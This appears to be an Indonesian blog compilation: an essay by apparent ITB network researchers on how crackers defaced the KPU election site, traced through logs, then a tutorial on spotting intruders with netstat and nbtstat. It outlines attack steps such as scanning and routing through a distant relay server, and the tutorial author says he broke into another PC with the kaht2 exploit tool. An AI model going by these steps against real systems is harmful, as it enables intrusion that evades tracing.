Informasi seperti ini banyak tersedia di Internet. Kadang-kadang cara yang biasa dipakai untuk masuk ini sudah disediakan dalam bentuk script yang tinggal diambil dan dijalankan, layaknya menjalankan aplikasi komputer biasa. Orang-orang yang masuk ke dalam kelompok ini sering disebut sebagai script kiddies (sebuah istilah yang menggambarkan bahwa anak kecil pun bisa melakukannya). Apa yang mereka butuhkan hanyalah informasi awal mengenai produk perangkat lunak apa dan versi berapa yang dipakai di server yang akan mereka bobol.

Komunitas hacker biasanya berkumpul secara virtual dalam chatroom di Internet. Berdiskusi mengenai hal-hal terkini dalam urusan keamanan dalam sistem komputer. Komunitas ini berkembang, anggotanya pun bertambah, kadang bisa juga berkurang. Anggotanya biasanya bertambah dari orang- orang yang ingin menjajal kemampuan mereka dalam hal ini.

Apalagi dengan kondisi usia yang sangat muda, mereka masih memiliki ego dan rasa ingin terkenal yang cukup besar. Mereka suka sekali dengan publikasi gratis dari media massa atas "hasil karya" mereka jika mereka berhasil menembus atau mengubah tampilan halaman sebuah situs di Internet.

Lain halnya ketika mereka sudah selesai menyalurkan ego gairah muda mereka. Mereka kemudian pensiun. Mereka yang sudah keluar dari komunitas ini biasanya mendapatkan pekerjaan sebagai system administrator jaringan komputer di perusahaan-perusahaan. Beberapa orang yang dianggap cukup pandai beralih menjadi konsultan keamanan sistem dan jaringan komputer, dengan bekal intuisi membobol sistem keamanan komputer yang dulu pernah mereka lakukan.

Merumuskan serangan

Seperti disebutkan tadi, gairah muda, ego, dan rasa ingin terkenal yang besar membuat mereka suka sekali diberi tantangan, bahkan acapkali mencari sendiri tantangan tersebut. Ini yang menyebabkan fenomena cracker menjadi fenomena kambuhan, tidak seperti fenomena spam atau worm virus yang kontinu sepanjang waktu.

Jika mereka ingin memasuki sistem milik orang lain, yang pertama mereka lakukan adalah dengan melakukan scanning (pemindaian, lihat Poin 1 pada grafik) terhadap sistem komputer yang mereka incar. Dengan ini mereka mendapatkan gambaran kasar mengenai sistem operasi dan aplikasi dari server sasaran. Alat yang dipakai cukup sederhana, contohnya Nmap (http://insecure.org/nmap/). Berbekal firewall yang tidak terlalu kompleks, maka tindakan scanning ini dapat diketahui oleh administrator jaringan, dan tercatat pada log firewall.

Ketika mereka sudah mengetahui sistem operasi dan aplikasi dari server tadi, mereka dapat merumuskan tipe serangan yang akan dilakukan (Poin 1). Dalam kasus pembobolan situs Komisi Pemilihan Umum (KPU), mereka mengetahui bahwa situs KPU menggunakan teknologi Microsoft Windows Server dengan web server IIS (Internet Information System), serta halaman web yang menggunakan teknologi ASP (Active Server Pages).

Nyaris tidak ada satu pun sistem yang bisa dijamin 100 persen aman, tidak memiliki kelemahan. Apalagi ketika sistem tersebut berhadapan langsung dengan akses publik, dalam hal ini Internet. Itulah kunci awalnya. Ditunjang oleh era informasi berupa fasilitas Internet yang menampung informasi dalam jumlah tak terhingga, siapa pun yang rajin dan telaten, mau meluangkan waktu, dipastikan akan mendapatkan informasi apa yang dia butuhkan.

Cukup sampai di sini? Tidak juga. Karena mereka masih harus mereka-reka struktur data seperti apa yang harus mereka ubah agar proses perubahan tertulis dengan normal. Proses mereka-reka ini bisa jadi membutuhkan waktu berhari-hari, sebelum seseorang berhasil mengetahui struktur seperti apa yang harus dimasukkan agar perubahan data berhasil.

Biasanya pula, seorang cracker yang akan melakukan serangan ini tidak terlalu bodoh. Ia harus melakukan serangan yang berhasil dalam satu tembakan, dan tembakan itu haruslah dilakukan dari tempat lain, bukan di tempat ia mengeksekusi, agar ia tidak mudah dikejar.

Maka yang dia lakukan adalah mencari sebuah server perantara, yang cukup jauh secara geografis (Poin 2) darinya, untuk melakukan serangan. Ketika server ini berhasil diakses (untuk kasus KPU, server perantara yang dipakai berada di Thailand), maka saatnya ia melakukan serangan.

Ketika serangan terjadi, maka serangan ini berhasil mengubah tampilan situs (Poin 3). . Nama-nama partai berubah menjadi nama yang aneh-aneh. Untunglah administrator Teknologi Informasi (TI) KPU cukup sigap dengan melakukan proses pembersihan pada server yang diserang.

Selain halaman web yang diserang diperbaiki strukturnya (Poin 4), firewall juga dikonfigurasi untuk menahan serangan sejenis ini (Poin 5) untuk sementara waktu. Serangan ini tercatat pula pada log (Point 6), yang memungkinkan administrator segera mengetahui dari mana serangan ini dilancarkan.

Berbekal log

Dalam "pertempuran digital" ini, senjata yang dimiliki oleh pihak yang bertahan adalah file log (catatan terhadap semua aktivitas yang terjadi di server). Log dari web server, log dari firewall, serta log dari IDS (Intrusion Detection System). Berbekal log ini, pencarian identitas sang penyerang dimulai.

Log file mencatat koneksi yang berhasil diterima atau ditolak server ataupun firewall. Log ini berisi alamat IP (Internet Protocol, alamat komputer) yang tersambung, serta waktu sambungan terjadi (Poin 7). Alamat IP di Internet berfungsi seperti alamat rumah, bersifat unik, tidak ada alamat yang sama di dunia Internet.

Dengan berbekal utilitas seperti traceroute dan whois, dengan cepat diketahui lokasi komputer tersebut dan siapa pemilik alamat IP tersebut (Poin 8), lengkap dengan contact person ISP di mana komputer tadi berada. Selanjutnya yang dibutuhkan adalah komunikasi dan koordinasi verbal dengan contact person tersebut (Poin 9).

Proses selanjutnya adalah identifikasi personal pelaku. Dengan bekal nama alias pelaku yang berhasil ditelusuri, didukung dengan adanya sistem data basis kependudukan Indonesia yang baru saja dihasilkan oleh KPU (dalam rangka pendaftaran pemilih pada Pemilu 2004), diperoleh informasi lengkap berupa tempat dan tanggal lahir serta alamat terkini tersangka.

Dengan bekal data ini beserta log kejadian pembobolan, tim TI KPU menyerahkan data ini kepada Satuan Khusus Cybercrime Polda Metro Jaya untuk diproses lebih lanjut. Cerita selanjutnya sudah dapat diketahui pada media massa. Dalam hitungan hari, tersangka dapat ditangkap.

Implikasi hukum

Aktivitas komunitas cracker ini sebenarnya hanyalah penyaluran adrenalin biasa, yang sayangnya sudah mulai masuk ruang publik dan dirasa mengganggu. Keahlian teknis yang mereka miliki pun sebenarnya tidak terlalu tinggi, yang dapat dipelajari dengan waktu luang yang cukup dan akses ke Internet. Mereka hanya kekurangan tempat praktikum untuk membuktikan ilmu yang mereka pelajari sehingga mereka mulai masuk ke ruang publik.

Sayang sekali, ketiadaan hukum membuat aktivitas mereka seakan-akan legal, padahal tidak. Coba dipikirkan, apakah Anda rela seseorang masuk ke rumah Anda dan mengacak-acak isi rumah, lalu dengan bebas keluar lagi tanpa ada yang bisa mengambil tindakan.

Parahnya, justru Anda yang disalahkan karena tidak mampu menjaga rumah dengan baik. Dalam kasus situs KPU, tindakan iseng yang dilakukan bukan hanya berakibat buruk kepada KPU, tetapi juga kepada seluruh bangsa Indonesia yang sedang melakukan hajatan besar, pemilihan umum. Untuk hal inilah sang cracker situs KPU harus dihukum seberat-beratnya karena kegiatan yang dilakukan berdampak besar kepada seluruh bangsa Indonesia. Kepada bangsa Indonesia-lah ia harus bertanggung jawab, bukan kepada KPU.

Tindakan Satuan Cybercrime Krimsus Polda Metro Jaya dalam merespons kasus ini betul-betul patut diberi acungan jempol karena mereka membuktikan komitmen mereka untuk aktif membasmi kejahatan kerah putih yang berkedok "orang iseng" dan "penyaluran adrenalin" yang nyatanya berdampak luas, mulai dari deface situs Internet sampai dengan kejahatan carding.

Untuk itulah komunitas TI seharusnya mendukung langkah Satuan Cybercrime untuk mulai membasmi pihak-pihak yang tidak bertanggung jawab ini, bukannya malah memberikan "dukungan moril" dengan melakukan promosi di media bahwa meng-hack itu mudah, meng-hack itu heroik, sistem tidak aman, dan lainnya yang secara tidak langsung malah menantang komunitas cracker untuk melakukan hal-hal yang negatif.

Kami sebagai peneliti jaringan komputer hanya berharap bahwa hukum di Indonesia mulai mampu memberikan rambu-rambu di dunia cyber sehingga akan jelas perbedaan antara seorang "anak iseng" yang kekurangan tempat penyaluran bakat dengan seorang yang melakukan tindak kejahatan. Sudah saatnya komunitas hacker menyadari bahwa tindakan mereka juga memiliki implikasi hukum, bukan lagi seperti Wild Wild West. Mereka bisa dikejar, mereka bisa ditangkap, apabila mereka melanggar ruang publik. Ini semua harus dilakukan agar dapat terbentuk kehidupan masyarakat TI Indonesia yang lebih baik.

Affan Basalamah dan Rahmat Zikri, staf peneliti jaringan komputer di Computer Network Research Group (CNRG) - ITB Bandung

MENDITEKSI PENYUSUP JARINGAN LEWAT DOS

MENDITEKSI PENYUSUP JARINGAN LEWAT DOS

Ternyata di Dos ada fasiltas yang mungkin kita semua lupakan dan jarang digunakan
perintah itu adalah NETSTAT . Windows menyediakan perintah ini untuk mendukung
jaringan . Netstat juga bisa digunakan untuk melihat ip-ip yang sedang terhubung
ke komputer kita .
Untuk itu buka dos command kamu , tau kan caranya :d kalau ga tau nich :
- Start>Run>command.exe [utk win 95/98]
- Start>Run>cmd.exe [utk win 2000/xp /nt]
lalu mucul deh command prompt

C:\winnt>netstat ?
Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval dedisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Sekarang kita gunakan netstat untuk melihat koneksi yang sedang terhubung gunakan -a

C:\winnt>netstat -a
Proto Local Address Foreign Address State
TCP me:http me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:https me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:microsoft-ds me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1025 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1027 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1028 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1146 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1163 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1253 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1261 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1288 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1306 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1314 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:5101 me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:epmap 10.22.1.236:4504 TIME_WAIT
TCP me:netbios-ssn me.ladomain.lintasarta.co.id:0 LISTENING
TCP me:1071 LAJKTTS02:1080 ESTABLISHED
TCP me:1288 IS~HRS:microsoft-ds ESTABLISHED
TCP me:1306 GREENGUY:microsoft-ds ESTABLISHED
UDP me:1134 *.*

sebelah nama pc itu adalah port yang digunakan untuk hubungan .
netstat diatas saya mengunakan komputer kantor yang mengunakan ip dhcp .
Disini kita bisa melihat siapa-siapa aja yang terhubung dalam komputer kita
atau dengan contoh yang lebih jelas ini . Untuk lebih jelasnya aku akan coba
menyusup ke komputer orang lain dengan mengunakan kaht2 :d
dan aku udah dapat menyusup.

C:\WINDOWS\System32>netstat -a
Active Connections

Proto Local Address Foreign Address State
TCP khs_2003:epmap khs_2003:0 LISTENING
TCP khs_2003:microsoft-ds khs_2003:0 LISTENING
TCP khs_2003:1025 khs_2003:0 LISTENING
TCP khs_2003:1063 khs_2003:0 LISTENING
TCP khs_2003:1093 khs_2003:0 LISTENING
TCP khs_2003:1136 khs_2003:0 LISTENING
TCP khs_2003:1138 khs_2003:0 LISTENING
TCP khs_2003:5000 khs_2003:0 LISTENING
TCP khs_2003:43715 khs_2003:0 LISTENING
TCP khs_2003:epmap 10.21.3.17:3628 TIME_WAIT <------1
TCP khs_2003:epmap 10.21.3.50:1686 FIN_WAIT_2 <------2
TCP khs_2003:netbios-ssn khs_2003:0 LISTENING
TCP khs_2003:1093 10.21.1.18:8080 CLOSE_WAIT
TCP khs_2003:1136 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:1138 10.21.1.18:8080 ESTABLISHED
TCP khs_2003:11196 khs_2003:0 LISTENING
TCP khs_2003:43715 10.21.3.50:1687 ESTABLISHED <------3
UDP khs_2003:microsoft-ds *:*
UDP khs_2003:isakmp *:*
UDP khs_2003:1028 *:*
UDP khs_2003:1035 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:netbios-ns *:*
UDP khs_2003:netbios-dgm *:*
UDP khs_2003:1900 *:*
UDP khs_2003:13715 *:*
UDP khs_2003:61804 *:*
UDP khs_2003:ntp *:*
UDP khs_2003:1032 *:*
UDP khs_2003:1036 *:*
UDP khs_2003:1107 *:*
UDP khs_2003:1134 *:*
UDP khs_2003:1900 *:*
Komputer ini sedang di susupi oleh aku coba lihat port nya.pada angka 3 ada
port yang dibuka kaht2 untuk menge sploit suatu komputer .
lalu bagaimana kita cara kita untuk mengetahui nama komputer yang sedang
menyusup ke komputer kita . Gunakan nbtstat -a
C:\WINDOWS\System32>nbtstat -a [ip]
C:\WINDOWS\Syetem32>nbtstat -a 10.21.3.50
Jantung:
Node IpAddress: [10.21.3.50] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
ME <00> UNIQUE Registered
ME <20> UNIQUE Registered
WORKGROUP <00> GROUP Registered
WORKGROUP <1e> GROUP Registered
ME <03> UNIQUE Registered
INet~Services <1c> GROUP Registered
IS~ME..........<00> UNIQUE Registered

MAC Address = 00-60-08-29-37-48

Coba lihat ternyata ip 10.21.3.50 nama pc nya adalah me dan dia join ke workgroup.
Kita bisa buat kaget orang yang mengintip kita itu gunakan netsend fasiltas yang
hanya ada pada win 2000/xp atau nt .

C:\winnt>net send [ip/nama pc] [pesan]

Makin berkembangnya teknologi informasi saat ini, kami juga melayani jasa perbaikan serta cleaning dan instalasi ulang berbagai merk note...